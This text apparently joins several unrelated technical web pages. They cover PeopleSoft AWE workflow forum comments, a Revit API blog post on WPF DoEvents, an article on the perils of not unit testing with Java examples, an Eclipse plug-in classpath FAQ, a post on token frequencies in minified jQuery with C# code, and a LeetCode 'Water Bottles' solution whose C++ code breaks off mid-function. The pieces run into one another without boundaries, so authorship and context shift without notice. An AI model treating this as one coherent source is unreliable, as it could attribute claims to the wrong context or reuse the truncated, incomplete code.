We need to specify the job level depending on the Grade field to specify whether leave should be Auto Approved or workflow should be triggered.
IF Grade <300 then approval required
IF Grade >300 Then Auto approved
IF Grade C1,C2 then Approval required
IF Grade P1,P2 then Auto approved.
Can you please help me what is the best way we can achieve this?
I have tried using User entered criteria but it is not working for me.
Also can you help me how the peoplesoft system evaluates the User Enter criteria ?
@Jack, I wish I could, but I'm not familiar enough with that specific workflow to speak intelligently about it. I suggest posting your question on the PeopleSoft General OTN Forum
Hi Jim,
I have posted my query to the General discussion forum, but there is no reply yet.
Anyway, if I want to try a custom App Package, then given the suggestions you provided above, where else do I need to include or change PeopleCode? I have never worked with an App Package before, so I am not sure how to do this.
An end-to-end example would be very helpful.
Regards,
Rashmin.
@Jack/Rashmin, First you create your App Class in Application Designer and then you assign it in the criteria section. You do not need to change any delivered code. If you are new to Application Classes, then you may find value in my chapter on creating Application Classes.
Hi Jim,
First of all, thanks a bunch for providing such an informative book on PeopleSoft!
And thanks for your quick help; I always find very helpful information on your blog.
Just one question came to mind.
I have created a new App Class and wrote a Check method to apply my custom validations (as I mentioned in my earlier comment, Grade-related validations from JOB).
Now, as you suggested, I will assign it in the criteria section and perform the necessary testing.
So is that all I need to do, or is there anything else I need to take care of?
Thanks,
Jack.
@Jack, yes, that is it.
Hi Jim,
Thanks a bunch for your quick help! I always find your blog very useful and also refer some of my friends and juniors to it to learn. Again, thanks a lot for making this blog and helping people. :)
I have created the App class with my custom validations.
Now, for one of the validations, I need to fetch the REG_REGION field from JOB, and to do so I need EMPLID, EMPL_RCD, EFFDT, etc.
So I need to know which record is passed as the parameter of the Check method and how I can get the above details in the custom App Class.
Thanks,
Jack.
@Jack, it has been so long since I reviewed this, I can't remember what &REC_ and &bindRec_ contain. If I were investigating this, I would print &REC_.Name and &bindRec_.Name to a log file.
Hi Jim,
Thanks for all your support and this blog. I got the whole requirement working and have created an App Class; it is working fine.
Below are a few points that I have researched, which might be helpful to our other friends.
1. The parameter for the Check procedure is nothing but an XREF record.
2. If you use the "User Entered" criteria type to provide criteria for your workflow, keep the below points in mind.
- You should have a few common keys between the header record and the record you select in the User Entered criteria.
- Make sure your selected record fetches only the top-most row per employee. If not, you can create a new view to fetch the top-most row.
Thanks,
Jack.
Really quick question:
I created an App Package for my criteria, and I am using the criteria in multiple stages.
How do I figure out what stage I am processing at any point in time?
I am assuming it is GetStageNbr from somewhere.
You may need to set the WORKFLOW trace for this. You might need to change the code a little, but you will get step-by-step information that way.
Question About WorkFlow Monitor
I want to reassign a user on a workflow I created.
On the Requisition and Expense Sheet it works as expected:
it reassigns to the new user, sets the worklist to worked, and creates a new worklist entry for the new user.
But on a new workflow it reassigns the new user and sets the worklist to worked, BUT it does not create the new worklist entry. Am I missing a setting somewhere?
Found the issue: I needed to set up a Re-Assign event, and then it all worked out great.
Hi,
How can I confirm, on clicking a transaction, whether it is at the final step in my AWE?
I have to make certain fields editable on the final step.
I know we can write SQL; however, I also found the function GetPendingSteps() but am not sure how to use it for this. Is there a function or code that can help with this?
Regards,
Ashwin
I have created an App Package similar to the one at the beginning of this post.
It is used in multiple stages and steps.
How can I tell what stage or step I am in while it is processing?
I also have an App Package for the user list, using something like the code below,
but again I need a way to get the stage and step it is processing.
import EOAW_CORE:DEFN:UserListBase;
import N_AUTH_PKG:Approval:Extended;
class Get_Req_Userlist extends EOAW_CORE:Defn:UserListBase
method Get_Req_Userlist(&rec_ As Record);
method GetUsers(&aryPrevOpr_ As array of string, &thread_ As Record) Returns array of string;
end-class;
Global Rowset &N_RS_Hier; /* Load In Approvals */
Global string &requestor_id;
Global string &N_AUTH_Key;
method Get_Req_Userlist
/+ &rec_ as Record +/
%Super = create EOAW_CORE:DEFN:UserListBase(&rec_);
end-method;
Hi Jim,
I have a question about Ad hoc approvers in AWE. Is it possible to add ad hoc approvers as 'Approvers' only and disable the feature to add them as 'Reviewers'?
I was looking at WEBLIB_EOAW.EOAW_MON_ADHOC.FieldFormula.IScript_Adhoc_Entry which is invoked when the '+' button next to approval step is clicked. It appears that the radio button for 'Reviewer' is static in the html EOAW_ADHOC_ENTRY_FORM.
I just wanted to check if you have come across this need before.
Thanks,
Tom
Jim Need some Guidance
I need to create a separate worklist going to another component, and it has been a while.
I know I need the worklist XREF record (_WL). Do I still need to create the Business Process and Activity? (It has been so long that I do not remember.)
And now in 8.54, is there a PeopleCode example you have lying around that creates the worklist entry with the component I want to connect to?
@travelingwilly, business process and activity... yes, it has been a long time since you created a workflow :). If you are on a 9.0+ application, odds are pretty high that you will want to use AWE. I have a free sample chapter that covers AWE and should get you going in the right direction.
Jim
Unfortunately this has nothing to do with workflow; I just want to create a worklist entry instead of sending an email to a user or role. I was hoping there was a more robust, programmatic way to do it (plus I would rather not have to remember all the steps to create the Business Process, Activity, mappings, etc.).
I got it to work. I was just hoping I could import a class, build a couple of objects, and then BAM, the worklist is created and sent to the user or role.
Hey Jim, do you know if it's possible to change the route on the fly, based on something the approver has triggered?
A simple scenario:
1. The transaction is routed to a group (persons A and B).
1.a. Person A approves the transaction and it routes to person C,
or
1.b. Person B approves the transaction and it routes to person D.
It's logic on the fly. I always thought of AWE as a dumb engine after a transaction is submitted and a route is created: it just routes after that. But if there is pre-route logic that can be done, I'm all ears.
Sincerely,
Thor
@Thor, it is a great question and one I can't remember. What I mean is, I can't remember if all of the approvers are determined at submission (I think they are for the approval viewer) or if they are determined after each approval step. I suggest you resubmit this question on the PeopleSoft OTN General Discussion forum.
Let's talk about doing events, from two radically different perspectives, one great big external one and lots of teeny-weeny little internal ones.
I'll share some pictures from the European DevDay conference and snow in Munich today, then discuss a WPF issue that came up last week:
- DevDay conference in Munich
- WPF DoEvents
- Addendum on WPF versus WinForms
- Addendum on Not Using Revit API within WPF DataContext
- WPF element id converter
DevDay Conference in Munich
Today we held the one and only European DevDay conference in Munich:
Jaime Rosales Duque came all the way from New York to help, and Jim Quanci even further, from San Francisco.
We have participants from all over Europe and even some from India.
The next few days are dedicated to an abbreviated Cloud Accelerator here that I am looking forward to very much.
Meanwhile, here is Maciej Szlek's WPF issue and solution:
WPF DoEvents
Exactly two months back, we discussed PickPoint with WPF and no threads attached.
Now another modeless WPF issue was raised and solved by Maciej 'Max' Szlek:
Question: I'm creating a WPF add-in that performs long-running operations.
During this time the add-in dialogue doesn't respond until the operation ends, even when calling the external event Raise method from a view-model command.
Do you have a workaround to keep the dialogue responsive while performing API operations?
Answer: Yes, I have heard about similar issues in the past involving blocking of modeless WPF forms.
Unfortunately, I cannot find the relevant thread any longer.
The workarounds involved stuff like setting the window focus, e.g. using GetForegroundWindow and SetForegroundWindow, and allowing the WPF form to access the Windows message queue.
I think Revit was somehow blocking the message queue, for some reason.
I think the solution involved calling the DoEvents method.
A couple of WPF issues came up in the forum in the past couple of years, e.g.:
- Revit API preventing WPF window regeneration
- WPF window loses control when Revit API displays an error
- WPF tutorial using WPF in Winforms
On the other hand, you can tell from these discussions that some people are successfully using WPF forms, and the development team are not aware of any issues with them.
I recommend sticking with Windows Forms if you have a choice.
Here is another recent article on modeless WPF forms, PickPoint and multithreading, addressing other issues that also might be of interest to you, an older one on WPF, and a comment on triggering an event from Jon.
Later, one little addition; I searched for "Revit API WPF DoEvents" and found this article on multithreading throwing exceptions in Revit 2015.
Response: I grabbed this DoEvents implementation on StackOverflow to "start work on a method that runs on the Dispatcher thread, and it needs to block without blocking the UI Thread... implement a DoEvents based on the Dispatcher itself".
I don't like it; it's not very elegant, and it forces me to break the MVVM pattern, but it works.
If you would like to see my ugly non-refactored test code, clone my ExternalEventTests sample on BitBucket, also saved locally here on The Building Coder.
I haven't tested it much yet but it seems to be stable.
You can run it from the add-in manager, since there are no static references to IExternalApplication.
Incidentally, it lets you check whether raised external events are queued or run alongside each other. They are queued, which is good, but I think it would be safer to adapt the solution below to a single external event; we don't know how the API engine will change in the future... ;) like the pattern for semi-asynchronous Idling API access...
Anyways thank you for your very accurate advice!
What might be of interest to you is WpfCommand.
WpfWindow contains a WPF implementation of the DoEvents method (in the way mentioned before), which is injected into the ViewModel to minimize dependencies.
ViewModel contains 3 commands.
The first picks doors (it uses part of my little cross-API-version framework), simply to check how the modeless WPF window behaves during hiding, picking and showing again.
The second and third flip doors; both have their own external event with different handler implementations. The ViewModel's setStatus method calls the injected DoEvents method.
If you have some more questions let me know.
Oh, and you can feel free to publish this solution on the blog of course, I don't have any problem with that ;)
Answer: When you mention picking and flipping doors, that reminds me of the Revit SDK ModelessDialog samples ModelessForm_ExternalEvent and ModelessForm_IdlingEvent.
Are you aware of those?
Is there any similarity, or is your sample completely unrelated to those?
Response: Yes, I'm aware of those, but my approach is quite different.
Congratulations to Max on solving this, and many thanks for sharing it here with us!
Addendum on WPF versus WinForms
Jeroen Van Vlierden adds an update:
Just to let you know: I noticed that you mentioned my thread on a WPF window losing control when Revit API displays an error above.
I can add to this that I managed to work around the issue by converting the WPF form to a user control and using this user control in a WinForms window with a WPF ElementHost.
That works fine.
It was however disappointing that I was forced to do this after I spent a lot of work on my application.
Converting the application to winforms is no longer an option, so I will stick to this for now.
Addendum on Not Using Revit API within WPF DataContext
Hps Anave shares another nugget of WPF experience in the Revit API discussion forum thread on Revit API DLL preventing WPF window regeneration:
Well, after a very long time integrating WPF in my own programs, my recommendation is NOT to use any Revit API class inside the view model class that you assign to the WPF window's DataContext.
If you ever want to pass or get any information coming from an element or a parameter, it is better to extract the element id's IntegerValue and, when you are done with the WPF window, just create an ElementId from the integer value you acquired from the WPF window.
There may be other solutions out there but this is the solution I have so far.
Many thanks to Hps for sharing this!
WPF Element Id Converter
In the same thread, Gonçalo Feio shared his WPF element id converter, saying, This works for me:
public class ElementIdConverter : IValueConverter
{
  public object Convert( object value, Type targetType, object parameter, CultureInfo culture )
  {
    if( value is R.ElementId )
    {
      return ( value as ElementId ).IntegerValue;
    }
    return -1;
  }

  public object ConvertBack( object value, Type targetType, object parameter, CultureInfo culture )
  {
    if( value is string )
    {
      int id;
      if( int.TryParse( value as string, out id ) )
      {
        return new ElementId( id );
      }
    }
    return ElementId.InvalidElementId;
  }
}
In this case, I expose an ElementId property in the view model.
You can also add validation to give some feedback to the end user.
Many thanks to Gonçalo for sharing this!
Unit testing is a widely accepted practice in most development shops in this day and age, especially with the advent of the tool JUnit. JUnit was so effective and widely used early on that it has been included in the default distribution of Eclipse for as long as I can remember, and I have been programming professionally in Java for about 8 years. However, the drawbacks of not unit testing are concrete and arise acutely from time to time. This article aims to give a few specific examples of the perils of not unit testing.
Unit Testing Benefits
Unit testing has several basic, tangible benefits that have reduced the painstaking troubles of the days when it was not widely used. Without getting into the specifics of the needs and arguments for unit testing, let's simply highlight the benefits as they are universally accepted by Java development professionals, especially within the Agile community.
- an automated regression unit test suite can isolate bugs by unit, as tests focus on one unit and mock out all other dependencies
- unit tests give feedback to the developer immediately during the test, code, test, code rhythm of development
- unit tests find defects early in the life cycle
- unit tests provide a safety net that facilitates the refactoring necessary to improve the design of code without breaking existing functionality
- unit tests, along with a code coverage tool, can produce tangible metrics such as code coverage, which is valuable given good-quality tests
- unit tests provide an executable example of how client code can use the various interfaces of the code base
- the code resulting from unit testing is typically more readable and concise, as code which is not so is difficult to unit test; thus code written in tandem with unit tests tends to be more modular and of higher quality
Perils of Not Unit Testing
Let’s explore by example how not unit testing can adversely affect code and allow bugs to easily enter a code base. The focus will be on the method level where methods are simple and straight forward, yet there still can be problems when code is not unit tested.
Example 1: Reuse some code, but you introduce a bug
This example illustrates a situation where a developer has good intentions of reusing some code but, due to a lack of unit testing, unintentionally introduces a bug. If unit tests existed, the developer could have refactored safely, relying on the unit tests to flag that a requirement was no longer covered.
Let’s introduce a simple scenario where a clothing store has as system that has users input sales of its clothes. Two objects in the system are: Shirt and ShirtSaleValidator. The ShirtSaleValidator checks the Shirt to see if the sale prices inputted are correct. In this case, a shirt sale price has to be between $0.01 and $15. (Note this example is overly simplified, but still illustrates the benefits of unit testing.)
Coder Joe implements the isShirtSalePriceValid method but writes no unit tests. He follows the requirements correctly; the code is correct.
package com.assarconsulting.store.model;

public class Shirt {

    private Double salePrice;
    private String type;

    public Shirt() {
    }

    public Double getSalePrice() {
        return salePrice;
    }

    public void setSalePrice(Double salePrice) {
        this.salePrice = salePrice;
    }

    public String getType() {
        return type;
    }

    public void setType(String type) {
        this.type = type;
    }
}
package com.assarconsulting.store.validator;

import com.assarconsulting.store.model.Shirt;
import com.assarconsulting.store.utils.PriceUtility;

public class ShirtSaleValidator {

    public ShirtSaleValidator() {
    }

    public boolean isShirtSalePriceValid(Shirt shirt) {
        if (shirt.getSalePrice() > 0 && shirt.getSalePrice() <= 15.00) {
            return true;
        }
        return false;
    }
}
Coder Bob comes along and he is “refactor” minded, he loves the DRY principle and wants to reuse code. During some other requirement he implemented a Range object. He sees its usage in the shirt pricing requirement as well. Note that Bob is not extensively familiar with Joe’s requirement, but familiar enough to feel competent enough to make a change. In addition, their group abides by the Extreme Programming principle of collective ownership.
Thus, Bob nobly makes the change to reuse some code. He quickly translates the existing code to use the utility method, and moves on satisfied.
package com.assarconsulting.store.validator;

import com.assarconsulting.store.model.Shirt;
import com.assarconsulting.store.utils.Range;

public class ShirtSaleValidator {

    public ShirtSaleValidator() {
    }

    public boolean isShirtSalePriceValid(Shirt shirt) {
        Range<Double> range = new Range<Double>(new Double(0), new Double(15));
        if (range.isValueWithinRange(shirt.getSalePrice())) {
            return true;
        }
        return false;
    }
}
package com.assarconsulting.store.utils;

import java.io.Serializable;

public class Range<T extends Comparable> implements Serializable {

    private T lower;
    private T upper;

    public Range(T lower, T upper) {
        this.lower = lower;
        this.upper = upper;
    }

    public boolean isValueWithinRange(T value) {
        return lower.compareTo(value) <= 0 && upper.compareTo(value) >= 0;
    }

    public T getLower() {
        return lower;
    }

    public T getUpper() {
        return upper;
    }
}
Since there were no unit tests, a bug was created and never caught at the time of implementation. This bug will go unnoticed until a developer or user specifically runs manual tests through the UI or some other client. What is the bug? The new code allows $0 to be a valid price for the Shirt, which the requirements do not permit.
This could have been easily caught if there were an existing set of unit tests to regression-test this requirement. We could have a minimal set of simple tests checking the range of prices for a shirt, run on each check-in or each build. For example, the test suite could have asserted the following.
- price = $0: isShirtSalePriceValid returns false
- price = $0.01: isShirtSalePriceValid returns true
- price = $5: isShirtSalePriceValid returns true
- price = $15: isShirtSalePriceValid returns true
- price = $16: isShirtSalePriceValid returns false
- price = $100: isShirtSalePriceValid returns false
If Bob has these tests to rely on, the first bullet point test would have failed, and he would have caught his bug immediately.
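Sketched as runnable checks (plain assertions rather than a JUnit test class, with Joe's validation logic inlined so the snippet is self-contained), the suite above might look like this:

```java
public class ShirtSalePriceTest {

    // Joe's original rule, inlined: a sale price must be greater
    // than $0 and at most $15.
    static boolean isShirtSalePriceValid(double salePrice) {
        return salePrice > 0 && salePrice <= 15.00;
    }

    static void check(boolean condition, String message) {
        if (!condition) {
            throw new AssertionError(message);
        }
    }

    public static void main(String[] args) {
        // Boundary cases from the list above; the $0 case is exactly
        // the one Bob's Range-based refactoring would fail.
        check(!isShirtSalePriceValid(0.00), "$0 must be invalid");
        check(isShirtSalePriceValid(0.01), "$0.01 must be valid");
        check(isShirtSalePriceValid(5.00), "$5 must be valid");
        check(isShirtSalePriceValid(15.00), "$15 must be valid");
        check(!isShirtSalePriceValid(16.00), "$16 must be invalid");
        check(!isShirtSalePriceValid(100.00), "$100 must be invalid");
        System.out.println("all shirt price checks passed");
    }
}
```

In a real JUnit suite each check would be its own @Test method, so a failing boundary shows up by name in the build report.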
Peril – Imagine hundreds of business requirements that are more complicated than this without unit testing. The compounding effect of not unit testing resulting in bugs, repeated code and difficult maintenance could be exponential compared to the safety net and reduced cost unit testing provides.
Example 2: Code not unit tested yields untestable code, which leads to unclean, hard to understand code.
Let’s continue the clothing store system example, which involves pricing of a shirt object. The business would like to introduce Fall Shirt Sale, which can be described as:
For the Fall, a shirt is eligible to be discounted by 20% if it is priced less than $10 and is a Polo brand. The Fall sales last from Sept 1, 2009 till Nov 15th 2009.
This functionality will be implemented in the ShirtSaleValidator class by Coder Joe, who plans not to write unit tests. Since testing methods is not on his radar, he is not concerned with making the method testable, i.e., keeping methods short and concise so as not to introduce too much of McCabe's cyclomatic complexity. Increased complexity is difficult to unit test, as many test cases are necessary to achieve code coverage. His code is correct, but may turn out something like the following.

public boolean isShirtEligibleForFallSaleNotTestable(Shirt shirt) {
    Date today = new Date();
    if (today.after(START_FALL_SALE_AFTER.getTime()) && today.before(END_FALL_SALE_BEFORE.getTime())) {
        if (shirt.getSalePrice() > 0 && shirt.getSalePrice() <= 10) {
            if (shirt.getType().equals("Polo")) {
                return true;
            }
        }
    }
    return false;
}
The problems with this code are numerous, including misplacement of logic according to OO principles and lack of Enums.
However, putting these other concerns aside, let's focus on the readability of this method. It is hard to ascertain its meaning just by looking at it for a short amount of time; a developer has to study the code to figure out which requirements it addresses. This is not optimal.
Now’s lets think about the testability of this method. If anyone was to test Joe’s code, after he decided to leave it this way due to his NOT unit testing, it would be very difficult to test. The code contains 3 nested if statements where 2 of them have ‘ands’ and they all net result in many paths through the code. The inputs to this test would be a nightmare. I view this type of code as a consequence of not following TDD, i.e. writing code without the intention of testing it.
A more TDD-oriented way of writing this code would be as follows.

public boolean isShirtEligibleForFallSale(Shirt shirt) {
    return isFallSaleInSession() && isShirtLessThanTen(shirt) && isShirtPolo(shirt);
}

protected boolean isFallSaleInSession() {
    Date today = new Date();
    return today.after(START_FALL_SALE_AFTER.getTime()) && today.before(END_FALL_SALE_BEFORE.getTime());
}

protected boolean isShirtLessThanTen(Shirt shirt) {
    return shirt.getSalePrice() > 0 && shirt.getSalePrice() <= 10;
}

protected boolean isShirtPolo(Shirt shirt) {
    return shirt.getType().equals("Polo");
}
From this code we can see that the method isShirtEligibleForFallSale() reads much like the requirement. The methods that compose it are readable. The requirements are broken up amongst the methods. We can test each component of the requirement separately with 2-3 test methods each. The code is clean and with a set of unit tests, there is proof of its correctness and a safety net for refactoring.
Peril – Writing code without the intention of testing can result in badly structured code as well as difficult to maintain code.
Conclusion
The above examples are only simple illustrations of the drawbacks of foregoing unit testing. The summation and compounding effect of the perils of not unit testing can make development difficult and costly to a system. I hope the illustrations above communicate the importance of unit testing code.
Source Code
peril-not-unit-testing.zip
Reference: Perils of Not Unit Testing from our JCG partner Nirav Assar at the Assar Java Consulting blog.
FAQ What is the classpath of a plug-in?
Developers coming from a more traditional Java programming environment are often confused by classpath issues in Eclipse. A typical Java application has a global namespace made up of the contents of the JARs on a single universal classpath. This classpath is typically specified either with a command line argument to the VM or by an operating system environment variable. In Eclipse, each plug-in has its own unique classpath. This classpath contains the following, in lookup order:
- The OSGi parent class loader. All class loaders in OSGi have a common parent class loader. By default, this is set to be the Java boot class loader. The boot loader typically only knows about rt.jar, but the boot classpath can be augmented with a command line argument to the VM.
- The exported libraries of all imported plug-ins. If imported plug-ins export their imports, you get access to their exported libraries, too. Plug-in libraries, imports, and exports are all specified in the plugin.xml file.
- The declared libraries of the plug-in and all its fragments. Libraries are searched in the order they are specified in the manifest. Fragment libraries are added to the end of the classpath in an unspecified order.
In Eclipse 2.1, the libraries from the org.eclipse.core.boot and org.eclipse.core.runtime were also automatically added to every plug-in’s classpath. This is not true in 3.0; you now need to declare the runtime plug-in in your manifest’s requires section, as with any other plug-in.
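For a 3.0-era plug-in still using a plugin.xml manifest, the libraries and imports described above are declared roughly like this (the plug-in id and library name here are illustrative, not from any real plug-in):

```xml
<plugin id="com.example.myplugin" name="Example Plug-in" version="1.0.0">
   <!-- Declared libraries: searched in the order listed -->
   <runtime>
      <library name="myplugin.jar">
         <export name="*"/>
      </library>
   </runtime>
   <!-- Imported plug-ins; in 3.0 the runtime plug-in must be declared
        explicitly. An import with export="true" re-exports that
        plug-in's libraries to this plug-in's own clients. -->
   <requires>
      <import plugin="org.eclipse.core.runtime"/>
      <import plugin="org.eclipse.ui" export="true"/>
   </requires>
</plugin>
```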
See Also:
- FAQ What is the plug-in manifest file (plugin.xml)?
- FAQ How do I make my plug-in connect to other plug-ins?
- FAQ How do I add a library to the classpath of a plug-in?
- FAQ How can I share a JAR among various plug-ins?
- FAQ How do I use the context class loader in Eclipse?
- Pragmatic Advice on PDE Classpath
This FAQ was originally published in Official Eclipse 3.0 FAQs. Copyright 2004, Pearson Education, Inc. All rights reserved. This text is made available here under the terms of the Eclipse Public License v1.0.
Tokenizing JavaScript - A look at what’s left after minification
Minifiers
JavaScript minifiers are popular these days. Closure, YUI Compressor, Microsoft Ajax Minifier, to name a few. Using one is essential for any site that uses more than a little script and cares about performance.
Each tool of course has advantages and disadvantages. But they all do a pretty good job. The results vary only slightly in the grand scheme of things. Not enough to make so much of a difference that I’d say you should always use one over the other – use whatever fits in with your environment best.
Tag Clouds
Anyway, it got me thinking. After crunching a script through one of these bad boys, what’s left?
The first thing I did was take jQuery 1.4.2 (the minified version) and push it into the tag cloud creator, Wordle. BAM! Beautiful, isn’t it?
It’s not that surprising that two of the longest keywords in JavaScript also happen to use up the most space: return, and function. What does it matter? The word function appears in jQuery 404 times, adding up to 3,232 bytes. That’s about 4.5% of the size of the library! return appears 385 times, adding up to 2,310 bytes, or 3.2%. So there you go – return and function make up a total of almost 8% of the size of jQuery!
Really makes me wish JavaScript had C# style llamas – err, lambdas.
Tokenizing
There are some problems here though. No tag cloud generator I could find was intended to be run on code. So it ignores things like operators, brackets, etc. And you know things like semicolons are frequent. Nor do they provide any kind of data feed of the document’s tokens. So, I created my own tool to generate the data.
Basically, I just have a list of possible tokens, and I run a regular expression on the code to determine how many times each occurs. Then, multiply by its length to get the total size of that token in the script.
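That counting idea can be sketched in a few lines. This illustration is in Java rather than the C# of the actual tool shown later, and it simplifies the real token list by treating every single punctuation character as its own token (so multi-character operators like === are not grouped):

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class TokenSizes {

    // Total bytes a token consumes = occurrences * token length.
    public static Map<String, Integer> tokenSizes(String source) {
        // Identifiers/numbers, or any single non-space punctuation character.
        Pattern token = Pattern.compile("[A-Za-z_0-9$]+|[^\\sA-Za-z_0-9$]");
        Map<String, Integer> counts = new LinkedHashMap<>();
        Matcher m = token.matcher(source);
        while (m.find()) {
            counts.merge(m.group(), 1, Integer::sum);
        }
        Map<String, Integer> sizes = new LinkedHashMap<>();
        counts.forEach((t, n) -> sizes.put(t, n * t.length()));
        return sizes;
    }

    public static void main(String[] args) {
        // "function" occurs once (8 bytes), "a" three times (3 bytes).
        System.out.println(tokenSizes("function a(){return a+a;}"));
    }
}
```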
Results
It’s amazing what the results show. The top 15 tokens represent 35% of the entire script, mostly single-character tokens:
It makes sense that function is the top token in size, since it is 8 characters long, even though it only occurs 404 times. But look at ".". Yes, dot. It's only one character long, but it represents 2,565 bytes. "(" and ")" together make up over 5k. return, despite being 6 characters long, is in 5th place.
What does it mean?
Well, actually, the fact that these syntax-related tokens are so high on the list is partially a testament to the effectiveness of minifiers. A minifier can only remove so much of the syntax, and you can't shorten these tokens. So if a minifier is doing its job, they should tend to bubble up to the top of the list.
Thankfully, Wordle supports an advanced mode that lets you enter the tokens and their weights manually. Armed with the output of this tool, here is the entire result set in tag cloud form. The relative sizes of the tags aren't quite right, though, simply because a "." renders smaller than letters in any font. Also, I don't really know why the first Wordle run produced a cloud that shows return bigger than function; I guess it's just a quirk in how it counts. All the more reason to use the advanced mode.
One thing it does is show ways that minifiers could do an even better job, or ways that we can code that reduce these tokens. For example, in theory a minifier could convert functions that use ‘return’ to assign to a parent-scope variable instead. That’s a fairly complex thing to do, so probably not worth it (performance seems equivalent, though). You can also try and structure your code so a function only has one ‘return’ instead of multiple.
This tool can help you find other tokens in your code that use a lot of space, too. For example, I applied it to the MicrosoftAjax.js script from .NET 3.5 and found to my horror that 'JavaScriptSerializer' was near the top of the list. That is why in the AjaxControlToolkit you will find this script greatly reduced in size: despite having many new features, it is 10k smaller, in minified form, than it was in .NET 3.5, partially thanks to this tool helping me identify the areas that needed improvement.
Notice ‘getElementsByTagName’ appears in jQuery a noticeable amount: it occurs 17 times, or 340 bytes. Also not so obvious is how often the characters ‘a’, ‘b’, etc. occur. These are the names the minifier assigns to local variables. ‘a’ is high on the list, since it is the first one used, but there are many in the top 100, all the way up to the letter ‘o’, totaling 5,228 bytes. So a minifier could do well to understand how local variables are used and reuse existing names when they are no longer needed.
The code is fairly simple. Again, this was something I wrote one evening off the cuff, so it's not perfect (thanks, by the way, to Brad and Damian for the nice LINQ way of converting the char array to a string array).
This is the code in C# for .NET 3.5.
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;
public static class Tokenizer {
public static IEnumerable<KeyValuePair<string, int>> Tokenize(string content) {
string[] tokens =
{ "===", "!==", "==", "<=", ">=", "!=", "-=", "+=", "*=", "/=", "|=", "%=", "^=", ">>=", ">>>=", "<<=",
"++", "--", "+", "-", "*", "\\", "/", "&&", "||", "&", "|", "%", "^", "~", "<<", ">>>", ">>",
"[", "]", "(", ")", ";", ".", "!", "?", ":", ",", "'", "\"", "{", "}" };
var escapedTokens = from token in tokens
select ("\\" + string.Join("\\",
(from c in token.ToCharArray() select c.ToString()).ToArray()));
string pattern = "[a-zA-Z_0-9\\$]+|" + string.Join("|", escapedTokens.ToArray());
var r = new Regex(pattern, RegexOptions.Compiled | RegexOptions.ExplicitCapture);
return from m in r.Matches(content).Cast<Match>()
group m by m.Value into g
orderby g.Count() descending
select new KeyValuePair<string, int>(g.Key, g.Count());
}
}
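If you would rather experiment without a C# toolchain, the same counting idea can be sketched in JavaScript itself. This is my own port, not part of the article's code, and the token list is slightly abbreviated:

```javascript
// Sketch of the token-frequency idea in JavaScript (abbreviated token list).
function tokenize(content) {
  // Multi-character tokens must come before their prefixes in the alternation.
  const tokens = [
    "===", "!==", "==", "<=", ">=", "!=", "-=", "+=", "*=", "/=",
    "|=", "%=", "^=", ">>>=", ">>=", "<<=", "++", "--", "&&", "||",
    ">>>", ">>", "<<", "+", "-", "*", "/", "%", "^", "~", "&", "|",
    "[", "]", "(", ")", ";", ".", "!", "?", ":", ",", "'", "\"", "{", "}"
  ];
  // Escape regex metacharacters in each token.
  const escaped = tokens.map(t => t.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"));
  // Identifiers/numbers first, then the punctuation tokens.
  const pattern = new RegExp("[a-zA-Z_0-9$]+|" + escaped.join("|"), "g");
  const counts = new Map();
  for (const m of content.match(pattern) || []) {
    counts.set(m, (counts.get(m) || 0) + 1);
  }
  // Return [token, count] pairs, most frequent first.
  return [...counts.entries()].sort((a, b) => b[1] - a[1]);
}
```

Running it over a minified file and printing the top pairs reproduces the kind of list shown above.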
You can also download the raw CSV file with the results for jQuery here.
Update: Thanks to David Fowler for linq-ifying the code and making it half as long!
Happy coding!
Source: http://weblogs.asp.net/infinitiesloop/tokenizing-javascript-a-look-at-what-s-left-after-minification
Problem statement
In the problem “Water Bottles” we are given two values: “numBottles”, the number of full water bottles we start with, and “numExchange”, the number of empty water bottles we can exchange at a time for one full water bottle.
Drinking a full water bottle turns it into an empty one. Our task is to find the maximum number of water bottles we can drink.
Example
Input: numBottles = 15, numExchange = 4
Output: 19
Explanation:
First round: drink the 15 full bottles, leaving 15 empty bottles.
Second round: exchange 12 of those empties for 3 full bottles, leaving 3 empty bottles. Drinking the 3 full bottles leaves a total of 6 empty bottles.
Third round: exchange 4 of those empties for 1 full bottle, leaving 2 empty bottles. Drinking that bottle leaves a total of 3 empty bottles.
Since a minimum of 4 empty bottles is required for an exchange, we cannot get a full water bottle anymore. So the maximum number of water bottles we can drink is 15+3+1=19.
Approach for Water Bottles Leetcode Solution
The basic approach is to simulate exactly what the question describes:
- Drink all the full water bottles; they become empty water bottles.
- Exchange the empty water bottles for as many full water bottles as possible.
- Repeat these steps until there are not enough empty bottles left to exchange for a full one.
- Return the total number of full water bottles we drank during the process.
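Those steps translate almost line for line into code. Here is a sketch in JavaScript (names follow the problem statement; this is not the site's official solution):

```javascript
// Straight simulation of the exchange process described above.
function numWaterBottlesSim(numBottles, numExchange) {
  let drunk = numBottles;   // drink every full bottle we start with
  let empties = numBottles; // ...leaving this many empty bottles
  while (empties >= numExchange) {
    const bought = Math.floor(empties / numExchange); // full bottles from exchange
    drunk += bought;
    empties = (empties % numExchange) + bought; // leftovers + newly emptied bottles
  }
  return drunk;
}
```

For the example above, numWaterBottlesSim(15, 4) walks through exactly the three rounds described and returns 19.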
We can improve the complexity of the solution by making a few observations:
- We start with numBottles full water bottles, so that is the minimum number of bottles we can drink.
- 1 full water bottle = 1 unit of water + 1 empty water bottle.
- From numExchange empty water bottles we get 1 full water bottle (1 unit of water + 1 empty water bottle). Equivalently, every (numExchange - 1) empty bottles buy 1 unit of water.
- But in the last round, if we are left with exactly (numExchange - 1) empty bottles, we cannot turn them into a unit of water.
- So the result is numBottles + numBottles/(numExchange - 1), and if numBottles % (numExchange - 1) == 0 we subtract 1 from the final answer.
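That last observation collapses the whole loop into arithmetic. Here is a JavaScript sketch of the constant-time formula, mirroring the C++/Java implementations below:

```javascript
// Closed-form version: every (numExchange - 1) empties buy one extra unit of
// water, except that the final (numExchange - 1) empties cannot be cashed in.
function numWaterBottles(numBottles, numExchange) {
  let ans = numBottles + Math.floor(numBottles / (numExchange - 1));
  if (numBottles % (numExchange - 1) === 0) {
    ans--; // the last batch of empties falls one short of an exchange
  }
  return ans;
}
```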
Implementation
C++ code for Water Bottles
#include <bits/stdc++.h>
using namespace std;

int numWaterBottles(int numBottles, int numExchange) {
    int ans = numBottles + (numBottles) / (numExchange - 1);
    if ((numBottles) % (numExchange - 1) == 0)
        ans--;
    return ans;
}

int main() {
    int numBottles = 15, numExchange = 4;
